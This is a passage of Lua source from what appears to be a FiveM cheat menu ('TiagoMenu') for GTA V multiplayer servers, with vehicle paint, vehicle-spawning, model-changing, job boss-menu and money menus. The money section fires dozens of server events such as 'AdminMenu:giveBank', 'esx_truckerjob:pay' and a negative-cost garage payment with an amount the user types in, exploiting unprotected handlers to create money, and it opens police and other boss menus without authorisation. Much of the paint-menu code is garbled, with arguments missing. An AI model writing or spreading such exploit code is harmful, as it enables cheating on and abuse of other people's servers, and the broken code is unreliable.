- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('matte1') then
- for dt, du in pairs(bj) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metal1') then
- for dt, du in pairs(bk) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('classic2') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metallic2') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('matte2') then
- for dt, du in pairs(bj) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metal2') then
- for dt, du in pairs(bk) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('classic3') then
- for dt, du in pairs(bh) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metallic3') then
- for dt, du in pairs(bh) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('matte3') then
- for dt, du in pairs(bj) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metal3') then
- for dt, du in pairs(bk) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('AICONTROLMENU') then
- if TiagoMenu.Button('~h~Configure AI ~g~Speed') then
- local cspeed = KeyboardInput('Enter Wanted MaxSpeed', '', 100)
- if cspeed ~= nil or cspeed ~= '' then
- aispeed = (cspeed .. '.0')
- SetDriveTaskMaxCruiseSpeed(GetPlayerPed(-1), tonumber(aispeed))
- end
- SetDriverAbility(GetPlayerPed(-1), 100.0)
- elseif TiagoMenu.Button('~h~AI Drive (Waypoint_Slow)') then
- if DoesBlipExist(GetFirstBlipInfoId(8)) then
- local blipIterator = GetBlipInfoIdIterator(8)
- local blip = GetFirstBlipInfoId(8, blipIterator)
- local wp = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector())
- local ped = GetPlayerPed(-1)
- ClearPedTasks(ped)
- local v = GetVehiclePedIsIn(ped, false)
- TaskVehicleDriveToCoord(ped, v, wp.x, wp.y, wp.z, tonumber(aispeed), 156, v, 5, 1.0, true)
- SetDriveTaskDrivingStyle(ped, 8388636)
- speedmit = true
- end
- elseif TiagoMenu.Button('~h~AI Drive (Waypoint_Fast)') then
- if DoesBlipExist(GetFirstBlipInfoId(8)) then
- local blipIterator = GetBlipInfoIdIterator(8)
- local blip = GetFirstBlipInfoId(8, blipIterator)
- local wp = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector())
- local ped = GetPlayerPed(-1)
- ClearPedTasks(ped)
- local v = GetVehiclePedIsIn(ped, false)
- TaskVehicleDriveToCoord(ped, v, wp.x, wp.y, wp.z, tonumber(aispeed), 156, v, 2883621, 5.5, true)
- SetDriveTaskDrivingStyle(ped, 2883621)
- speedmit = true
- end
- elseif TiagoMenu.Button('~h~AI Drive (Wander)') then
- local ped = GetPlayerPed(-1)
- ClearPedTasks(ped)
- local v = GetVehiclePedIsIn(ped, false)
- print('Configured speed is currently ' .. aispeed)
- TaskVehicleDriveWander(ped, v, tonumber(aispeed), 8388636)
- elseif TiagoMenu.Button('~h~Stop AI') then
- speedmit = false
- if IsPedInAnyVehicle(GetPlayerPed(-1)) then
- ClearPedTasks(GetPlayerPed(-1))
- else
- ClearPedTasksImmediately(GetPlayerPed(-1))
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('LSC') then
- veh = GetVehiclePedIsUsing(PlayerPedId())
- TiagoMenu.MenuButton('~h~Exterior ~r~Tuning', 'tunings')
- TiagoMenu.MenuButton('~h~Performance ~r~Tuning', 'performance')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('CarTypes') then
- for i, dF in ipairs(aY) do
- if TiagoMenu.MenuButton('~h~~r~> ~s~' .. dF, 'CarTypeSelection') then
- carTypeIdx = i
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('CarTypeSelection') then
- for i, dF in ipairs(aZ[carTypeIdx]) do
- if TiagoMenu.MenuButton('~h~~r~# ~s~' .. dF, 'CarOptions') then
- carToSpawn = i
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('CarOptions') then
- if TiagoMenu.Button('~h~~y~-Spawn intro vehicle-') then
- local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
- local veh = aZ[carTypeIdx][carToSpawn]
- if veh == nil then
- veh = 'adder'
- end
- vehiclehash = GetHashKey(veh)
- RequestModel(vehiclehash)
- Citizen.CreateThread(
- function()
- local dG = 0
- while not HasModelLoaded(vehiclehash) do
- dG = dG + 100
- Citizen.Wait(100)
- if dG > 5000 then
- ShowNotification('~h~~r~Cannot spawn this vehicle.')
- break
- end
- end
- SpawnedCar =
- CreateVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
- SetVehicleStrong(SpawnedCar, true)
- SetPedIntoVehicle(PlayerPedId(), SpawnedCar, -1)
- SetVehicleEngineOn(SpawnedCar, true, true, false)
- SetVehicleEngineCanDegrade(SpawnedCar, false)
- end
- )
- elseif TiagoMenu.Button('~h~~g~-Spawn vehicle-') then
- local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
- local veh = aZ[carTypeIdx][carToSpawn]
- if veh == nil then
- veh = 'adder'
- end
- vehiclehash = GetHashKey(veh)
- RequestModel(vehiclehash)
- Citizen.CreateThread(
- function()
- local dG = 0
- while not HasModelLoaded(vehiclehash) do
- dG = dG + 100
- Citizen.Wait(100)
- if dG > 5000 then
- ShowNotification('~h~~r~Cannot spawn this vehicle.')
- break
- end
- end
- SpawnedCar =
- CreateVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
- SetVehicleStrong(SpawnedCar, true)
- SetVehicleEngineOn(SpawnedCar, true, true, false)
- SetVehicleEngineCanDegrade(SpawnedCar, false)
- end
- )
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("VehBoostMenu") then
- if TiagoMenu.Button('Engine Power boost ~r~RESET') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x2') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x4') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x8') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x16') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x32') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 32.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x64') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 64.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x128') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 128.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~x512') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 512.0 * 20.0)
- elseif TiagoMenu.Button('Engine Power boost ~g~ULTIMATE') then
- SetVehicleEnginePowerMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5012.0 * 20.0)
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("Models") then
- if TiagoMenu.ComboBox("~h~~b~Male Model", peds2, currentPedd, selectedPedd, function(currentIndex, selectedIndex)
- currentPedd = currentIndex
- selectedPedd = selectedIndex
- end)
- then
- elseif TiagoMenu.Button("Selected ~b~> ") then
- Deer.Destroy()
- Wait(100)
- local model1 = GetHashKey(peds2[selectedPedd])
- local player1 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model1)
- while not HasModelLoaded(model1) do
- Wait(100)
- end
- SetPlayerModel(player1, model1)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model1)
- elseif TiagoMenu.ComboBox("~h~~p~Female Model", peds3, currentPeddd, selectedPeddd, function(currentIndex, selectedIndex)
- currentPeddd = currentIndex
- selectedPeddd = selectedIndex
- end)
- then
- elseif TiagoMenu.Button("Selected ~p~>") then
- Deer.Destroy()
- Wait(100)
- local model5 = GetHashKey(peds3[selectedPeddd])
- local player5 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model5)
- while not HasModelLoaded(model5) do
- Wait(100)
- end
- SetPlayerModel(player5, model5)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model5)
- elseif TiagoMenu.ComboBox("~h~~o~Animal Model", peds4, currentPedddd, selectedPedddd, function(currentIndex, selectedIndex)
- currentPedddd = currentIndex
- selectedPedddd = selectedIndex
- end)
- then
- elseif TiagoMenu.Button("Selected ~o~> ") then
- Deer.Destroy()
- Wait(100)
- local model6 = GetHashKey(peds4[selectedPedddd])
- local player6 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model6)
- while not HasModelLoaded(model6) do
- Wait(100)
- end
- SetPlayerModel(player6, model6)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model6)
- elseif TiagoMenu.Button("Spawn ~r~Deer ~s~And Ride") then
- Deer.Create()
- Citizen.Wait(150)
- Deer.Ride()
- elseif TiagoMenu.Button("~g~Reset Model To FiveM Player") then
- Deer.Destroy()
- Wait(100)
- local model3 = GetHashKey("mp_m_freemode_01")
- local player3 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model3)
- while not HasModelLoaded(model3) do
- Wait(100)
- end
- SetPlayerModel(player3, model3)
- SetPedDefaultComponentVariation(GetPlayerPed(-1))
- SetModelAsNoLongerNeeded(model3)
- elseif TiagoMenu.Button("Change To ~y~Trevor") then
- Deer.Destroy()
- Wait(100)
- local model13 = GetHashKey("player_two")
- local player1 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model13)
- while not HasModelLoaded(model13) do
- Wait(100)
- end
- SetPlayerModel(player1, model13)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model1)
- elseif TiagoMenu.Button("Change To ~b~Michael") then
- Deer.Destroy()
- Wait(100)
- local model12 = GetHashKey("player_zero")
- local player1 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model12)
- while not HasModelLoaded(model12) do
- Wait(100)
- end
- SetPlayerModel(player1, model12)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model12)
- elseif TiagoMenu.Button("Change To ~g~Franklin") then
- Deer.Destroy()
- Wait(100)
- local model11 = GetHashKey("player_one")
- local player1 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model11)
- while not HasModelLoaded(model11) do
- Wait(100)
- end
- SetPlayerModel(player1, model11)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model11)
- elseif TiagoMenu.Button("Change To ~r~Alien") then
- Deer.Destroy()
- Wait(100)
- local model121 = GetHashKey("s_m_m_movalien_01")
- local player1 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model121)
- while not HasModelLoaded(model121) do
- Wait(100)
- end
- SetPlayerModel(player1, model121)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model121)
- elseif TiagoMenu.Button("Change To ~h~Bigfoot") then
- Deer.Destroy()
- Wait(100)
- local model122 = GetHashKey("ig_orleans")
- local player1 = PlayerId()
- local playerPed = GetPlayerPed(-1)
- RequestModel(model122)
- while not HasModelLoaded(model122) do
- Wait(100)
- end
- SetPlayerModel(player1, model122)
- SetPedComponentVariation(GetPlayerPed(-1), 0, i, 0, 0)
- SetModelAsNoLongerNeeded(model122)
- elseif TiagoMenu.Button("Change To ~p~Clown") then
- local model = "s_m_y_clown_01"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("Change To ~r~Stripper") then
- local model = "s_f_y_stripper_01"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("Change To ~b~Cop") then
- local model = "s_m_y_cop_01"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("Change To ~o~Chimp") then
- local model = "a_c_chimp"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("Change To ~g~Alien") then
- local model = "s_m_m_movalien_01"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("Change To ~p~Pongo") then
- local model = "u_m_y_pogo_01"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("Change To ~o~Babyd") then
- local model = "u_m_y_babyd"
- RequestModel(GetHashKey(model))
- Wait(500)
- if HasModelLoaded(GetHashKey(model)) then
- SetPlayerModel(PlayerId(), GetHashKey(model))
- end
- elseif TiagoMenu.Button("~h~Randomize ~r~Model") then
- SetPedRandomComponentVariation(PlayerPedId(), true)
- elseif TiagoMenu.Button("Change Clothes (~g~ESX~s~) (NOT TESTED)") then
- TriggerEvent('esx_skin:openSaveableMenu')
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("ServerMenu") then
- if TiagoMenu.MenuButton("~s~Menu ~h~~r~JOBS", "RecrutarPlayers") then
- elseif TiagoMenu.MenuButton("~s~Menu ~b~~h~BOSS", "ESXBoss") then
- elseif TiagoMenu.MenuButton("~s~Menu ~g~~h~MONEY", "ESXMoney") then
- elseif TiagoMenu.MenuButton("~s~Menu ~p~~h~DRUGS", "ESXDrugs") then
- elseif TiagoMenu.MenuButton("~s~Menu ~o~~h~OTHERS", "ESXMisc") then
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("ESXBoss") then
- if TiagoMenu.Button("~c~~h~Mechanic~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'mecano', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~b~~h~Police~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'police', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~r~~h~Ambulance~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'ambulance', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~y~~h~Taxi~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'taxi', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~g~~h~Real Estate~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'realestateagent', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~p~~h~Gang~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'gang', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~o~~h~Car Dealer~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'cardealer', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~y~~h~Banker~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'banker', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~c~~h~Mafia~s~ Boss Menu") then
- TriggerEvent('esx_society:openBossMenu', 'mafia', function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- elseif TiagoMenu.Button("~g~~h~ESX ~y~Custom Boss Menu") then
- local result = KeyboardInput("Enter Boss Menu Script Name", "", 10)
- if result then
- TriggerEvent('esx_society:openBossMenu', result, function(data,menu) menu.close() end)
- setMenuVisible(currentMenu, false)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("ESXMoney") then
- if TiagoMenu.Button("~h~~r~→ ~s~~h~ BEST MONEY ~h~~r~←") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('esx_truckerjob:pay', result)
- TriggerServerEvent('vrp_slotmachine:server:2', result)
- TriggerServerEvent("esx_pizza:pay", result)
- TriggerServerEvent('esx_jobs:caution', 'give_back', result)
- TriggerServerEvent('lscustoms:payGarage', result)
- TriggerServerEvent('esx_tankerjob:pay', result)
- TriggerServerEvent('esx_vehicletrunk:giveDirty', result)
- TriggerServerEvent('f0ba1292-b68d-4d95-8823-6230cdf282b6', result)
- TriggerServerEvent('gambling:spend', result)
- TriggerServerEvent('265df2d8-421b-4727-b01d-b92fd6503f5e', result)
- TriggerServerEvent('AdminMenu:giveDirtyMoney', result)
- TriggerServerEvent('AdminMenu:giveBank', result)
- TriggerServerEvent('AdminMenu:giveCash', result)
- TriggerServerEvent('esx_slotmachine:sv:2', result)
- TriggerServerEvent('esx_truckerjob:pay', result)
- TriggerServerEvent('esx_moneywash:deposit', result)
- TriggerServerEvent('esx_moneywash:withdraw', result)
- TriggerServerEvent('esx_moneywash:deposit', result)
- TriggerServerEvent('mission:completed', result)
- TriggerServerEvent('truckerJob:success',result)
- TriggerServerEvent('c65a46c5-5485-4404-bacf-06a106900258', result)
- TriggerServerEvent("dropOff", result)
- TriggerServerEvent('truckerfuel:success',result)
- TriggerServerEvent('delivery:success',result)
- TriggerServerEvent("lscustoms:payGarage", {costs = -result})
- TriggerServerEvent("esx_brinksjob:pay", result)
- TriggerServerEvent("esx_garbagejob:pay", result)
- TriggerServerEvent("esx_postejob:pay", result)
- TriggerServerEvent('KorioZ-PersonalMenu:Admin_giveCash', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~1") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent("esx_jobs:caution", "give_back", result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~2") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('esx_truckerjob:pay', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~3") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('AdminMenu:giveBank', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~4") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('AdminMenu:giveCash', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~5") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent("esx_gopostaljob:pay", result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~6") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent("esx_banksecurity:pay", result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~7") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent("esx_slotmachine:sv:2", result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~8") then
- local result = KeyboardInput("Enter amount of money", "", 100)
- if result then
- TriggerServerEvent("lscustoms:payGarage", {costs = -result})
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~9") then
- local result = KeyboardInput("Enter amount of money", "", 100)
- if result then
- TriggerServerEvent("vrp_slotmachine:server:2", result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~10") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('AdminMenu:giveDirtyMoney', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~11") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('esx_truckerjob:pay', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~12") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
- if result then
- TriggerServerEvent('delivery:success', result)
- end
- elseif TiagoMenu.Button("~g~~h~MONEY ~s~13") then
- local result = KeyboardInput("Enter amount of money", "", 100000000)
